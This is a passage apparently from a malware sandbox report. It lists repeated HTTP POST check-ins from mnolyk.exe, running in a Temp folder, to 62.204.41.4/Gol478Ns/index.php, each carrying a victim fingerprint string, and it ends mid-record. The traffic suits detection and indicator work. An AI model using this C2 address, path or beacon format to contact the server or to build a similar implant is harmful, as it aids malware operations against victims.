Feb 7, 2023 19:58:04.066329956 CET	422	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
211	192.168.2.5	49920	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:04.285165071 CET	423	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:04.347853899 CET	423	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
212	192.168.2.5	49921	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:04.595004082 CET	424	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:04.658869982 CET	424	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
213	192.168.2.5	49922	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:06.074309111 CET	425	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:06.138298988 CET	425	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
214	192.168.2.5	49923	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:06.395394087 CET	426	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:06.459228992 CET	426	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
215	192.168.2.5	49924	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:07.066104889 CET	427	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:07.132631063 CET	427	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
216	192.168.2.5	49925	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:07.476078033 CET	428	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:07.540460110 CET	428	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
217	192.168.2.5	49926	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:07.720136881 CET	429	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:07.785341024 CET	429	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
218	192.168.2.5	49927	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:07.969609022 CET	430	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:08.033973932 CET	430	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
219	192.168.2.5	49928	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:08.200691938 CET	430	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:08.264710903 CET	431	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.5	49722	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:11.275289059 CET	150	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:11.338613033 CET	150	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
220	192.168.2.5	49929	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:08.454291105 CET	431	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:08.518445015 CET	432	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
221	192.168.2.5	49930	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:08.681863070 CET	432	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:08.744241953 CET	433	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
222	192.168.2.5	49931	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:08.920913935 CET	433	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:08.987000942 CET	434	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
223	192.168.2.5	49932	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:09.150326967 CET	434	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:09.213221073 CET	435	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
224	192.168.2.5	49933	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:09.387567997 CET	435	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:09.450397968 CET	436	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
225	192.168.2.5	49934	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:09.625814915 CET	436	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:09.691184044 CET	437	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
226	192.168.2.5	49935	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:09.870706081 CET	438	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:09.935203075 CET	438	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
227	192.168.2.5	49937	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:10.104815006 CET	445	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:10.169941902 CET	445	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
228	192.168.2.5	49938	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:10.348629951 CET	446	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:10.413582087 CET	446	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
229	192.168.2.5	49939	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:10.592369080 CET	448	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:10.654983044 CET	448	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.5	49723	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:11.507306099 CET	151	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:11.572401047 CET	151	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
230	192.168.2.5	49940	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
